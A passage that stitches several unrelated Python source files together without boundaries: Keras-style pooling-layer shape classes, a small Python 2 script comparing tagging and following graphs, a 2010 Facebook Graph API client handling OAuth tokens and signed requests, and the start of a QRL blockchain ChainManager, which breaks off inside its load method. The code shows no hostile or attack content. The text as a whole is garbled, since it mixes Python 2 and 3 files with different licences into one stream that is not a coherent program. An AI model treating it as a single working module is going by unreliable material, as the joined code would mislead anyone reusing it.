        assert padding in {'valid', 'same'}, 'border_mode must be in {valid, same}'
        self.pool_length = pool_size
        # Stride defaults to the pool size when not given.
        self.stride = pool_size if strides is None else strides
        self.border_mode = padding

    def get_output_shape_for(self, input_shape):
        """Compute (batch, pooled_steps, channels) for *input_shape*."""
        steps = conv_output_length(input_shape[1], self.pool_length,
                                   self.border_mode, self.stride)
        return (input_shape[0], steps, input_shape[2])

class LW_MaxPooling1D(_LW_Pooling1D):
    """Max pooling for temporal data; all shape logic lives in the base class.

    The overridden ``__init__`` merely forwarded identical arguments to the
    base constructor, so it has been removed in favor of inheritance.
    """

class LW_AveragePooling1D(_LW_Pooling1D):
    """1D average pooling; all shape logic lives in _LW_Pooling1D."""

    def __init__(self, pool_size=2, strides=None, padding='valid'):
        _LW_Pooling1D.__init__(self, pool_size, strides, padding)

###############################################
class _LW_Pooling2D(LW_Layer):
    """Shared shape arithmetic for 2D pooling layers."""

    def __init__(self, pool_size=(2, 2), strides=None, padding='valid', data_format='default'):
        if data_format == 'default':
            data_format = default_data_format
        assert data_format in {'channels_last', 'channels_first'}, 'data_format must be in {channels_last, channels_first}'
        self.pool_size = tuple(pool_size)
        # Strides default to the pool size, mirroring Keras behaviour.
        self.strides = self.pool_size if strides is None else tuple(strides)
        assert padding in {'valid', 'same'}, 'border_mode must be in {valid, same}'
        self.border_mode = padding
        self.dim_ordering = data_format

    def get_output_shape_for(self, input_shape):
        """Map a 4D input shape to its pooled output shape."""
        if self.dim_ordering == 'channels_first':
            rows, cols = input_shape[2], input_shape[3]
        elif self.dim_ordering == 'channels_last':
            rows, cols = input_shape[1], input_shape[2]
        else:
            raise Exception('Invalid dim_ordering: ' + self.dim_ordering)
        rows = conv_output_length(rows, self.pool_size[0], self.border_mode, self.strides[0])
        cols = conv_output_length(cols, self.pool_size[1], self.border_mode, self.strides[1])
        if self.dim_ordering == 'channels_first':
            return (input_shape[0], input_shape[1], rows, cols)
        # dim_ordering is guaranteed 'channels_last' here by the check above.
        return (input_shape[0], rows, cols, input_shape[3])

class LW_MaxPooling2D(_LW_Pooling2D):
    """2D max pooling; all shape logic lives in _LW_Pooling2D."""

    def __init__(self, pool_size=(2, 2), strides=None, padding='valid', data_format='default'):
        _LW_Pooling2D.__init__(self, pool_size, strides, padding, data_format)

class LW_AveragePooling2D(_LW_Pooling2D):
    """2D average pooling; all shape logic lives in _LW_Pooling2D."""

    def __init__(self, pool_size=(2, 2), strides=None, padding='valid', data_format='default'):
        _LW_Pooling2D.__init__(self, pool_size, strides, padding, data_format)

###############################################
class _LW_Pooling3D(LW_Layer):
    """Shared shape arithmetic for 3D pooling layers."""

    def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='default'):
        if dim_ordering == 'default':
            dim_ordering = default_data_format
        assert dim_ordering in {'channels_last', 'channels_first'}, 'data_format must be in {channels_last, channels_first}'
        self.pool_size = tuple(pool_size)
        # Strides default to the pool size, mirroring Keras behaviour.
        self.strides = self.pool_size if strides is None else tuple(strides)
        assert border_mode in {'valid', 'same'}, 'border_mode must be in {valid, same}'
        self.border_mode = border_mode
        self.dim_ordering = dim_ordering

    def get_output_shape_for(self, input_shape):
        """Map a 5D input shape to its pooled output shape."""
        if self.dim_ordering == 'channels_first':
            spatial = [input_shape[2], input_shape[3], input_shape[4]]
        elif self.dim_ordering == 'channels_last':
            spatial = [input_shape[1], input_shape[2], input_shape[3]]
        else:
            raise Exception('Invalid dim_ordering: ' + self.dim_ordering)
        pooled = [conv_output_length(dim, self.pool_size[i], self.border_mode, self.strides[i])
                  for i, dim in enumerate(spatial)]
        if self.dim_ordering == 'channels_first':
            return (input_shape[0], input_shape[1], pooled[0], pooled[1], pooled[2])
        # dim_ordering is guaranteed 'channels_last' here by the check above.
        return (input_shape[0], pooled[0], pooled[1], pooled[2], input_shape[4])

class LW_MaxPooling3D(_LW_Pooling3D):
    """3D max pooling; all shape logic lives in _LW_Pooling3D."""

    def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='default'):
        _LW_Pooling3D.__init__(self, pool_size, strides, border_mode, dim_ordering)

class LW_AveragePooling3D(_LW_Pooling3D):
    """3D average pooling; all shape logic lives in _LW_Pooling3D."""

    def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='default'):
        _LW_Pooling3D.__init__(self, pool_size, strides, border_mode, dim_ordering)

###############################################
class _LW_GlobalPooling1D(LW_Layer):
    """Base for global 1D pooling: collapses axis 1 entirely."""

    def __init__(self):
        pass

    def get_output_shape_for(self, input_shape):
        """(batch, steps, features) -> (batch, features)."""
        batch, features = input_shape[0], input_shape[2]
        return (batch, features)

class LW_GlobalAveragePooling1D(_LW_GlobalPooling1D):
    """Global average pooling over axis 1; shape logic in the base class."""

class LW_GlobalMaxPooling1D(_LW_GlobalPooling1D):
    """Global max pooling over axis 1; shape logic in the base class."""

###############################################
class _LW_GlobalPooling2D(LW_Layer):
    """Base for global 2D pooling: keeps only batch and channel axes."""

    def __init__(self, data_format='default'):
        if data_format == 'default':
            data_format = default_data_format
        self.dim_ordering = data_format

    def get_output_shape_for(self, input_shape):
        """Return (batch, channels); the channel axis position depends on dim_ordering."""
        channel_axis = 3 if self.dim_ordering == 'channels_last' else 1
        return (input_shape[0], input_shape[channel_axis])

class LW_GlobalAveragePooling2D(_LW_GlobalPooling2D):
    """Global average pooling over both spatial axes; shape logic in the base class."""

class LW_GlobalMaxPooling2D(_LW_GlobalPooling2D):
    """Global max pooling over both spatial axes; shape logic in the base class."""

###############################################
class _LW_GlobalPooling3D(LW_Layer):
    """Base for global 3D pooling: keeps only batch and channel axes."""

    def __init__(self, data_format='default'):
        if data_format == 'default':
            data_format = default_data_format
        self.dim_ordering = data_format

    def get_output_shape_for(self, input_shape):
        """Return (batch, channels); the channel axis position depends on dim_ordering."""
        channel_axis = 4 if self.dim_ordering == 'channels_last' else 1
        return (input_shape[0], input_shape[channel_axis])

class LW_GlobalAveragePooling3D(_LW_GlobalPooling3D):
    """Global average pooling over all three spatial axes; shape logic in the base class."""

class LW_GlobalMaxPooling3D(_LW_GlobalPooling3D):
    """Global max pooling over all three spatial axes; shape logic in the base class."""

###############################################
# Import-only module: nothing to run when executed directly.
if __name__ == '__main__':
    pass
import sys

tagging_filepath = sys.argv[1]
following_filepath = sys.argv[2]

delim = '\t'
if len(sys.argv) > 3:
    delim = sys.argv[3]

graph = {}
for line in open(tagging_filepath):
    entry = line.rstrip().split('\t')
    src = entry[0]
    dst = entry[1]
    if not src in graph: graph[src] = {}
    graph[src][dst] = 0

for line in open(following_filepath):
    entry = line.rstrip().split('\t')
    src = entry[0]
    dst = entry[1]
    if src in graph and dst in graph[src]:
        graph[src][dst] += 1
    if dst in graph and src in graph[dst]:
        graph[dst][src] += 2

w_dir = 0
wo_dir = 0
count = 0.0
for src in graph:
    for dst in graph[src]:
        val = graph[src][dst]
        count += 1
        if val in [1,3]:
            w_dir += 1
        if val in [1,2,3]:
            wo_dir += 1

print "%s\t%s" % (w_dir/count, wo_dir/count)

#!/usr/bin/env python
#
# Copyright 2010 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""Python client library for the Facebook Platform.

This client library is designed to support the Graph API and the
official Facebook JavaScript SDK, which is the canonical way to
implement Facebook authentication. Read more about the Graph API at
http://developers.facebook.com/docs/api. You can download the Facebook
JavaScript SDK at http://github.com/facebook/connect-js/.

If your application is using Google AppEngine's webapp framework, your
usage of this module might look like this:

user = facebook.get_user_from_cookie(self.request.cookies, key, secret)
if user:
    graph = facebook.GraphAPI(user["access_token"])
    profile = graph.get_object("me")
    friends = graph.get_connections("me", "friends")

"""

import cgi
import time
import urllib
import urllib2
import httplib
import hashlib
import hmac
import base64
import logging
import socket

# Find a JSON parser
try:
    import simplejson as json
except ImportError:
    try:
        from django.utils import simplejson as json
    except ImportError:
        import json
_parse_json = json.loads

# Find a query string parser
try:
    from urlparse import parse_qs
except ImportError:
    from cgi import parse_qs


class GraphAPI(object):
    """A client for the Facebook Graph API.

See http://developers.facebook.com/docs/api for complete
documentation for the API.

The Graph API is made up of the objects in Facebook (e.g., people,
pages, events, photos) and the connections between them (e.g.,
friends, photo tags, and event RSVPs). This client provides access
to those primitive types in a generic way. For example, given an
OAuth access token, this will fetch the profile of the active user
and the list of the user's friends:

graph = facebook.GraphAPI(access_token)
user = graph.get_object("me")
friends = graph.get_connections(user["id"], "friends")

You can see a list of all of the objects and connections supported
by the API at http://developers.facebook.com/docs/reference/api/.

You can obtain an access token via OAuth or by using the Facebook
JavaScript SDK. See
http://developers.facebook.com/docs/authentication/ for details.

If you are using the JavaScript SDK, you can use the
get_user_from_cookie() method below to get the OAuth access token
for the active user from the cookie saved by the SDK.

"""
    def __init__(self, access_token=None, timeout=None):
        self.access_token = access_token
        self.timeout = timeout

    def get_object(self, id, **args):
        """Fetchs the given object from the graph."""
        return self.request(id, args)

    def get_objects(self, ids, **args):
        """Fetchs all of the given object from the graph.

We return a map from ID to object. If any of the IDs are
invalid, we raise an exception.
"""
        args["ids"] = ",".join(ids)
        return self.request("", args)

    def get_connections(self, id, connection_name, **args):
        """Fetchs the connections for given object."""
        return self.request(id + "/" + connection_name, args)

    def put_object(self, parent_object, connection_name, **data):
        """Writes the given object to the graph, connected to the given parent.

For example,

graph.put_object("me", "feed", message="Hello, world")

writes "Hello, world" to the active user's wall. Likewise, this
will comment on a the first post of the active user's feed:

feed = graph.get_connections("me", "feed")
post = feed["data"][0]
graph.put_object(post["id"], "comments", message="First!")

See http://developers.facebook.com/docs/api#publishing for all
of the supported writeable objects.

Certain write operations require extended permissions. For
example, publishing to a user's feed requires the
"publish_actions" permission. See
http://developers.facebook.com/docs/publishing/ for details
about publishing permissions.

"""
        assert self.access_token, "Write operations require an access token"
        return self.request(parent_object + "/" + connection_name,
                            post_args=data)

    def put_wall_post(self, message, attachment={}, profile_id="me"):
        """Writes a wall post to the given profile's wall.

We default to writing to the authenticated user's wall if no
profile_id is specified.

attachment adds a structured attachment to the status message
being posted to the Wall. It should be a dictionary of the form:

{"name": "Link name"
"link": "http://www.example.com/",
"caption": "{*actor*} posted a new review",
"description": "This is a longer description of the attachment",
"picture": "http://www.example.com/thumbnail.jpg"}

"""
        return self.put_object(profile_id, "feed", message=message,
                               **attachment)

    def put_comment(self, object_id, message):
        """Writes the given comment on the given post."""
        return self.put_object(object_id, "comments", message=message)

    def put_like(self, object_id):
        """Likes the given post."""
        return self.put_object(object_id, "likes")

    def delete_object(self, id):
        """Deletes the object with the given ID from the graph."""
        self.request(id, post_args={"method": "delete"})

    def delete_request(self, user_id, request_id):
        """Deletes the Request with the given ID for the given user."""
        conn = httplib.HTTPSConnection('graph.facebook.com')

        url = '/%s_%s?%s' % (
            request_id,
            user_id,
            urllib.urlencode({'access_token': self.access_token}),
        )
        conn.request('DELETE', url)
        response = conn.getresponse()
        data = response.read()

        response = _parse_json(data)
        # Raise an error if we got one, but don't not if Facebook just
        # gave us a Bool value
        if (response and isinstance(response, dict) and response.get("error")):
            raise GraphAPIError(response)

        conn.close()

    def put_photo(self, image, message=None, album_id=None, **kwargs):
        """Uploads an image using multipart/form-data.

image=File like object for the image
message=Caption for your image
album_id=None posts to /me/photos which uses or creates and uses
an album for your application.

"""
        object_id = album_id or "me"
        #it would have been nice to reuse self.request;
        #but multipart is messy in urllib
        post_args = {
            'access_token': self.access_token,
            'source': image,
            'message': message,
        }
        post_args.update(kwargs)
        content_type, body = self._encode_multipart_form(post_args)
        req = urllib2.Request(("https://graph.facebook.com/%s/photos" %
                               object_id),
                              data=body)
        req.add_header('Content-Type', content_type)
        try:
            data = urllib2.urlopen(req).read()
        #For Python 3 use this:
        #except urllib2.HTTPError as e:
        except urllib2.HTTPError, e:
            data = e.read() # Facebook sends OAuth errors as 400, and urllib2
                             # throws an exception, we want a GraphAPIError
        try:
            response = _parse_json(data)
            # Raise an error if we got one, but don't not if Facebook just
            # gave us a Bool value
            if (response and isinstance(response, dict) and
                    response.get("error")):
                raise GraphAPIError(response)
        except ValueError:
            response = data

        return response

    # based on: http://code.activestate.com/recipes/146306/
    def _encode_multipart_form(self, fields):
        """Encode files as 'multipart/form-data'.

Fields are a dict of form name-> value. For files, value should
be a file object. Other file-like objects might work and a fake
name will be chosen.

Returns (content_type, body) ready for httplib.HTTP instance.

"""
        BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'
        CRLF = '\r\n'
        L = []
        for (key, value) in fields.items():
            logging.debug("Encoding %s, (%s)%s" % (key, type(value), value))
            if not value:
                continue
            L.append('--' + BOUNDARY)
            if hasattr(value, 'read') and callable(value.read):
                filename = getattr(value, 'name', '%s.jpg' % key)
                L.append(('Content-Disposition: form-data;'
                          'name="%s";'
                          'filename="%s"') % (key, filename))
                L.append('Content-Type: image/jpeg')
                value = value.read()
                logging.debug(type(value))
            else:
                L.append('Content-Disposition: form-data; name="%s"' % key)
            L.append('')
            if isinstance(value, unicode):
                logging.debug("Convert to ascii")
                value = value.encode('ascii')
            L.append(value)
        L.append('--' + BOUNDARY + '--')
        L.append('')
        body = CRLF.join(L)
        content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
        return content_type, body

    def request(self, path, args=None, post_args=None):
        """Fetches the given path in the Graph API.

We translate args to a valid query string. If post_args is
given, we send a POST request to the given path with the given
arguments.

"""
        args = args or {}

        if self.access_token:
            if post_args is not None:
                post_args["access_token"] = self.access_token
            else:
                args["access_token"] = self.access_token
        post_data = None if post_args is None else urllib.urlencode(post_args)
        try:
            file = urllib2.urlopen("https://graph.facebook.com/" + path + "?" +
                                   urllib.urlencode(args),
                                   post_data, timeout=self.timeout)
        except urllib2.HTTPError, e:
            response = _parse_json(e.read())
            raise GraphAPIError(response)
        except TypeError:
            # Timeout support for Python <2.6
            if self.timeout:
                socket.setdefaulttimeout(self.timeout)
            file = urllib2.urlopen("https://graph.facebook.com/" + path + "?" +
                                   urllib.urlencode(args), post_data)
        try:
            fileInfo = file.info()
            if fileInfo.maintype == 'text':
                response = _parse_json(file.read())
            elif fileInfo.maintype == 'image':
                mimetype = fileInfo['content-type']
                response = {
                    "data": file.read(),
                    "mime-type": mimetype,
                    "url": file.url,
                }
            else:
                raise GraphAPIError('Maintype was not text or image')
        finally:
            file.close()
        if response and isinstance(response, dict) and response.get("error"):
            raise GraphAPIError(response["error"]["type"],
                                response["error"]["message"])
        return response

    def fql(self, query, args=None, post_args=None):
        """FQL query.

Example query: "SELECT affiliations FROM user WHERE uid = me()"

"""
        args = args or {}
        if self.access_token:
            if post_args is not None:
                post_args["access_token"] = self.access_token
            else:
                args["access_token"] = self.access_token
        post_data = None if post_args is None else urllib.urlencode(post_args)

        """Check if query is a dict and
use the multiquery method
else use single query
"""
        if not isinstance(query, basestring):
            args["queries"] = query
            fql_method = 'fql.multiquery'
        else:
            args["query"] = query
            fql_method = 'fql.query'

        args["format"] = "json"

        try:
            file = urllib2.urlopen("https://api.facebook.com/method/" +
                                   fql_method + "?" + urllib.urlencode(args),
                                   post_data, timeout=self.timeout)
        except TypeError:
            # Timeout support for Python <2.6
            if self.timeout:
                socket.setdefaulttimeout(self.timeout)
            file = urllib2.urlopen("https://api.facebook.com/method/" +
                                   fql_method + "?" + urllib.urlencode(args),
                                   post_data)

        try:
            content = file.read()
            response = _parse_json(content)
            #Return a list if success, return a dictionary if failed
            if type(response) is dict and "error_code" in response:
                raise GraphAPIError(response)
        except Exception, e:
            raise e
        finally:
            file.close()

        return response

    def extend_access_token(self, app_id, app_secret):
        """
Extends the expiration time of a valid OAuth access token. See
<https://developers.facebook.com/roadmap/offline-access-removal/
#extend_token>

"""
        args = {
            "client_id": app_id,
            "client_secret": app_secret,
            "grant_type": "fb_exchange_token",
            "fb_exchange_token": self.access_token,
        }
        response = urllib.urlopen("https://graph.facebook.com/oauth/"
                                  "access_token?" +
                                  urllib.urlencode(args)).read()
        query_str = parse_qs(response)
        if "access_token" in query_str:
            result = {"access_token": query_str["access_token"][0]}
            if "expires" in query_str:
                result["expires"] = query_str["expires"][0]
            return result
        else:
            response = json.loads(response)
            raise GraphAPIError(response)


class GraphAPIError(Exception):
    """Error raised for any failure reported by the Facebook API.

    result is the raw decoded payload (usually a dict, sometimes a plain
    string); type and message are extracted from whichever of the several
    Facebook error formats the payload uses.
    """

    def __init__(self, result):
        self.result = result
        try:
            self.type = result["error_code"]
        except (KeyError, TypeError):
            # Narrowed from a bare except: only a missing key or a
            # non-mapping result (e.g. a plain string) falls through.
            self.type = ""

        # OAuth 2.0 Draft 10
        try:
            self.message = result["error_description"]
        except (KeyError, TypeError):
            # OAuth 2.0 Draft 00
            try:
                self.message = result["error"]["message"]
            except (KeyError, TypeError):
                # REST server style
                try:
                    self.message = result["error_msg"]
                except (KeyError, TypeError):
                    self.message = result

        Exception.__init__(self, self.message)


def get_user_from_cookie(cookies, app_id, app_secret):
    """Parses the cookie set by the official Facebook JavaScript SDK.

    cookies should be a dictionary-like object mapping cookie names to
    cookie values.

    If the user is logged in via Facebook, we return a dictionary with
    the keys "uid" and "access_token". The former is the user's
    Facebook ID, and the latter can be used to make authenticated
    requests to the Graph API. If the user is not logged in, we
    return None.

    Download the official Facebook JavaScript SDK at
    http://github.com/facebook/connect-js/. Read more about Facebook
    authentication at
    http://developers.facebook.com/docs/authentication/.
    """
    raw_cookie = cookies.get("fbsr_" + app_id, "")
    if not raw_cookie:
        return None
    parsed = parse_signed_request(raw_cookie, app_secret)
    if not parsed:
        return None
    try:
        token_info = get_access_token_from_code(parsed["code"], "",
                                                app_id, app_secret)
    except GraphAPIError:
        return None
    token_info["uid"] = parsed["user_id"]
    return token_info


def parse_signed_request(signed_request, app_secret):
    """Return dictionary with signed request data.

    We return a dictionary containing the information in the
    signed_request. This includes a user_id if the user has authorised
    your application, as well as any information requested.

    If the signed_request is malformed or corrupted, False is returned.
    """
    try:
        encoded_sig, payload = map(str, signed_request.split('.', 1))

        sig = base64.urlsafe_b64decode(encoded_sig + "=" *
                                       ((4 - len(encoded_sig) % 4) % 4))
        data = base64.urlsafe_b64decode(payload + "=" *
                                        ((4 - len(payload) % 4) % 4))
    except (IndexError, ValueError):
        # Signed request was malformed.
        # BUG FIX: a signed_request without a '.' makes the two-target
        # unpacking raise ValueError, which the old IndexError-only
        # handler let escape.
        return False
    except TypeError:
        # Signed request had a corrupted payload.
        return False

    data = _parse_json(data)
    if data.get('algorithm', '').upper() != 'HMAC-SHA256':
        return False

    # HMAC can only handle ascii (byte) strings
    # http://bugs.python.org/issue5285
    app_secret = app_secret.encode('ascii')
    payload = payload.encode('ascii')

    expected_sig = hmac.new(app_secret,
                            msg=payload,
                            digestmod=hashlib.sha256).digest()
    if sig != expected_sig:
        return False

    return data


def auth_url(app_id, canvas_url, perms=None, **kwargs):
    """Build the Facebook OAuth dialog URL for *app_id* redirecting to *canvas_url*.

    perms, if given, becomes a comma-joined "scope" parameter; extra keyword
    arguments are appended to the query string as-is.
    """
    params = {'client_id': app_id, 'redirect_uri': canvas_url}
    if perms:
        params['scope'] = ",".join(perms)
    params.update(kwargs)
    return "https://www.facebook.com/dialog/oauth?" + urllib.urlencode(params)

def get_access_token_from_code(code, redirect_uri, app_id, app_secret):
    """Get an access token from the "code" returned from an OAuth dialog.

    Returns a dict containing the user-specific access token and its
    expiration date (if applicable).
    """
    args = {
        "code": code,
        "redirect_uri": redirect_uri,
        "client_id": app_id,
        "client_secret": app_secret,
    }
    # We would use GraphAPI.request() here, except for the fact that the
    # success response is a key-value query string, not JSON.
    raw = urllib.urlopen("https://graph.facebook.com/oauth/access_token" +
                         "?" + urllib.urlencode(args)).read()
    fields = parse_qs(raw)
    if "access_token" not in fields:
        # Error responses ARE JSON, so decode and wrap them.
        raise GraphAPIError(json.loads(raw))
    token_info = {"access_token": fields["access_token"][0]}
    if "expires" in fields:
        token_info["expires"] = fields["expires"][0]
    return token_info


def get_app_access_token(app_id, app_secret):
    """Get the access_token for the app.

    This token can be used for insights and creating test users.

    app_id = retrieved from the developer page
    app_secret = retrieved from the developer page

    Returns the application access_token.
    """
    # Request an app token via the client-credentials grant.
    params = {'grant_type': 'client_credentials',
              'client_id': app_id,
              'client_secret': app_secret}

    resp = urllib2.urlopen("https://graph.facebook.com/oauth/access_token?" +
                           urllib.urlencode(params))

    try:
        # Response body is "access_token=<token>"; keep only the value.
        token = resp.read().split("=")[1]
    finally:
        resp.close()

    return token

# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
import threading
from typing import Optional, Tuple

from pyqrllib.pyqrllib import bin2hstr
from pyqryptonight.pyqryptonight import StringToUInt256, UInt256ToString

from qrl.core import config, BlockHeader
from qrl.core.AddressState import AddressState
from qrl.core.Block import Block
from qrl.core.BlockMetadata import BlockMetadata
from qrl.core.DifficultyTracker import DifficultyTracker
from qrl.core.GenesisBlock import GenesisBlock
from qrl.core.PoWValidator import PoWValidator
from qrl.core.txs.Transaction import Transaction
from qrl.core.txs.CoinBase import CoinBase
from qrl.core.TransactionPool import TransactionPool
from qrl.core.misc import logger
from qrl.crypto.Qryptonight import Qryptonight
from qrl.generated import qrl_pb2, qrlstateinfo_pb2


class ChainManager:
    """Manage the main chain held in ``_state``: block addition, difficulty
    tracking, chain queries and fork recovery.

    A single re-entrant ``lock`` guards the public accessors, so methods may
    safely call each other while holding it.  ``trigger_miner`` is set to
    True whenever the mainchain tip changes so the miner can restart on
    fresh work.
    """

    def __init__(self, state):
        # Persistent chain/address-state backend.
        self._state = state
        self.tx_pool = TransactionPool(None)
        # Tip starts as a detached copy of the genesis block until load().
        self._last_block = Block.deserialize(GenesisBlock().serialize())
        self.current_difficulty = StringToUInt256(str(config.user.genesis_difficulty))

        self.trigger_miner = False
        self.lock = threading.RLock()

    @property
    def height(self):
        """Block number of the current tip, or -1 if no tip is set."""
        with self.lock:
            if not self._last_block:
                return -1
            return self._last_block.block_number

    @property
    def last_block(self) -> Block:
        """Current mainchain tip block."""
        with self.lock:
            return self._last_block

    @property
    def total_coin_supply(self):
        """Total coin supply as reported by the state backend."""
        with self.lock:
            return self._state.total_coin_supply

    def get_block_datapoint(self, headerhash):
        """Return the state backend's datapoint for ``headerhash``."""
        with self.lock:
            return self._state.get_block_datapoint(headerhash)

    def get_cumulative_difficulty(self):
        """Cumulative difficulty accumulated up to the current tip."""
        with self.lock:
            last_block_metadata = self._state.get_block_metadata(self._last_block.headerhash)
            return last_block_metadata.cumulative_difficulty

    def get_block_by_number(self, block_number) -> Optional[Block]:
        """Mainchain block at ``block_number``, or None if unknown."""
        with self.lock:
            return self._state.get_block_by_number(block_number)

    def get_block_header_hash_by_number(self, block_number) -> Optional[bytes]:
        """Headerhash of the mainchain block at ``block_number``, or None."""
        with self.lock:
            return self._state.get_block_header_hash_by_number(block_number)

    def get_block(self, header_hash: bytes) -> Optional[Block]:
        """Stored block with the given headerhash, or None."""
        with self.lock:
            return self._state.get_block(header_hash)

    def get_address_balance(self, address: bytes) -> int:
        """Balance of ``address`` according to the state backend."""
        with self.lock:
            return self._state.get_address_balance(address)

    def get_address_is_used(self, address: bytes) -> bool:
        """True if ``address`` has been seen on chain."""
        with self.lock:
            return self._state.get_address_is_used(address)

    def get_address_state(self, address: bytes) -> AddressState:
        """Full AddressState record for ``address``."""
        with self.lock:
            return self._state.get_address_state(address)

    def get_all_address_state(self):
        """All AddressState records known to the state backend."""
        with self.lock:
            return self._state.get_all_address_state()

    def get_tx_metadata(self, transaction_hash) -> list:
        """Metadata for a confirmed transaction hash."""
        with self.lock:
            return self._state.get_tx_metadata(transaction_hash)

    def get_last_transactions(self):
        """Most recent confirmed transactions."""
        with self.lock:
            return self._state.get_last_txs()

    def get_unconfirmed_transaction(self, transaction_hash) -> list:
        """Return ``[tx, timestamp]`` for an unconfirmed transaction.

        Searches the active pool first, then the pending pool; returns an
        empty list when the hash is not queued anywhere.
        """
        with self.lock:
            for tx_set in self.tx_pool.transactions:
                tx = tx_set[1].transaction
                if tx.txhash == transaction_hash:
                    return [tx, tx_set[1].timestamp]
            if transaction_hash in self.tx_pool.pending_tx_pool_hash:
                for tx_set in self.tx_pool.pending_tx_pool:
                    tx = tx_set[1].transaction
                    if tx.txhash == transaction_hash:
                        return [tx, tx_set[1].timestamp]

            return []

    def get_block_metadata(self, header_hash: bytes) -> Optional[BlockMetadata]:
        """BlockMetadata for ``header_hash``, or None if not stored."""
        with self.lock:
            return self._state.get_block_metadata(header_hash)

    def get_blockheader_and_metadata(self, block_number=0) -> Tuple:
        """Return ``(blockheader, blockmetadata)`` for a block number.

        ``block_number=0`` means "use the current height".  Returns
        ``(None, None)`` when the block cannot be found.
        """
        with self.lock:
            block_number = block_number or self.height  # if both are non-zero, then block_number takes priority

            result = (None, None)
            block = self.get_block_by_number(block_number)
            if block:
                blockheader = block.blockheader
                blockmetadata = self.get_block_metadata(blockheader.headerhash)
                result = (blockheader, blockmetadata)

            return result

    def get_block_to_mine(self, miner, wallet_address) -> list:
        """Ask the miner for a block template built on the current tip."""
        with miner.lock:  # Trying to acquire miner.lock to make sure pre_block_logic is not running
            with self.lock:
                last_block = self.last_block
                last_block_metadata = self.get_block_metadata(last_block.headerhash)
                return miner.get_block_to_mine(wallet_address,
                                               self.tx_pool,
                                               last_block,
                                               last_block_metadata.block_difficulty)

    def get_measurement(self, block_timestamp, parent_headerhash, parent_metadata: BlockMetadata):
        """Timing measurement used by the difficulty tracker."""
        with self.lock:
            return self._state.get_measurement(block_timestamp, parent_headerhash, parent_metadata)

    def get_block_size_limit(self, block: Block):
        """Maximum allowed size for ``block`` per the state backend."""
        with self.lock:
            return self._state.get_block_size_limit(block)

    def get_block_is_duplicate(self, block: Block) -> bool:
        """True if a block with this headerhash is already stored."""
        with self.lock:
            return self._state.get_block(block.headerhash) is not None

    def validate_mining_nonce(self, blockheader: BlockHeader, enable_logging=True):
        """Verify the PoW of ``blockheader`` against the difficulty derived
        from its parent.  Returns True when the mining blob meets the target.
        """
        with self.lock:
            parent_metadata = self.get_block_metadata(blockheader.prev_headerhash)
            parent_block = self._state.get_block(blockheader.prev_headerhash)

            # Recompute the expected difficulty/target from the parent.
            measurement = self.get_measurement(blockheader.timestamp, blockheader.prev_headerhash, parent_metadata)
            diff, target = DifficultyTracker.get(
                measurement=measurement,
                parent_difficulty=parent_metadata.block_difficulty)

            if enable_logging:
                logger.debug('-----------------START--------------------')
                logger.debug('Validate                #%s', blockheader.block_number)
                logger.debug('block.timestamp         %s', blockheader.timestamp)
                logger.debug('parent_block.timestamp  %s', parent_block.timestamp)
                logger.debug('parent_block.difficulty %s', UInt256ToString(parent_metadata.block_difficulty))
                logger.debug('diff                    %s', UInt256ToString(diff))
                logger.debug('target                  %s', bin2hstr(target))
                logger.debug('-------------------END--------------------')

            if not PoWValidator().verify_input(blockheader.mining_blob, target):
                if enable_logging:
                    logger.warning("PoW verification failed")
                    qn = Qryptonight()
                    tmp_hash = qn.hash(blockheader.mining_blob)
                    logger.warning("{}".format(bin2hstr(tmp_hash)))
                    logger.debug('%s', blockheader.to_json())
                return False

            return True

    def get_headerhashes(self, start_blocknumber):
        """Build a NodeHeaderHash message covering headerhashes from
        ``start_blocknumber`` up to at most ``2 * reorg_limit`` blocks ahead
        (clamped to the current tip).
        """
        with self.lock:
            start_blocknumber = max(0, start_blocknumber)
            end_blocknumber = min(self._last_block.block_number,
                                  start_blocknumber + 2 * config.dev.reorg_limit)

            total_expected_headerhash = end_blocknumber - start_blocknumber + 1

            node_header_hash = qrl_pb2.NodeHeaderHash()
            node_header_hash.block_number = start_blocknumber

            block = self._state.get_block_by_number(end_blocknumber)
            block_headerhash = block.headerhash
            node_header_hash.headerhashes.append(block_headerhash)
            end_blocknumber -= 1

            # Walk backwards using each block's cached last_N_headerhashes,
            # collecting hashes newest-first.
            while end_blocknumber >= start_blocknumber:
                block_metadata = self._state.get_block_metadata(block_headerhash)
                for headerhash in block_metadata.last_N_headerhashes[-1::-1]:
                    node_header_hash.headerhashes.append(headerhash)
                end_blocknumber -= len(block_metadata.last_N_headerhashes)
                if len(block_metadata.last_N_headerhashes) == 0:
                    break
                block_headerhash = block_metadata.last_N_headerhashes[0]

            # Reverse into ascending order and trim any overshoot at the front.
            node_header_hash.headerhashes[:] = node_header_hash.headerhashes[-1::-1]
            del node_header_hash.headerhashes[:len(node_header_hash.headerhashes) - total_expected_headerhash]

            return node_header_hash

    def set_broadcast_tx(self, broadcast_tx):
        """Install the callback the tx pool uses to broadcast transactions."""
        with self.lock:
            self.tx_pool.set_broadcast_tx(broadcast_tx)

    def load(self, genesis_block):
        """Initialise chain state from storage, bootstrapping from
        ``genesis_block`` when the database is empty.
        """
        # load() has the following tasks:
        # Write Genesis Block into State immediately
        # Register block_number <-> blockhash mapping
        # Calculate difficulty Metadata for Genesis Block
        # Generate AddressStates from Genesis Block balances
        # Apply Genesis Block's transactions to the state
        # Detect if we are forked from genesis block and if so initiate recovery.
        height = self._state.get_mainchain_height()

        if height == -1:
            # Fresh database: persist genesis and its number<->hash mapping.
            self._state.put_block(genesis_block, None)
            block_number_mapping = qrl_pb2.BlockNumberMapping(headerhash=genesis_block.headerhash,
                                                              prev_headerhash=genesis_block.prev_headerhash)

            self._state.put_block_number_mapping(genesis_block.block_number, block_number_mapping, None)
